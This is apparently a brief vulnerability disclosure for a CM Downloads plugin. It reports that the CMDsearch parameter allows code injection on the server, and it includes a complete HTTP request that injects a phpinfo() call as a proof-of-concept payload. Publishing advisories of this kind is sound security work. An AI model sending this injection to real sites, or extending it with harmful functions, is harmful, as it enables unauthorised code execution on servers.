The plugin does not validate and sanitise the CMDsearch parameter which used to create a custom function. This allows attacker to run arbitrary command on the remote server
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive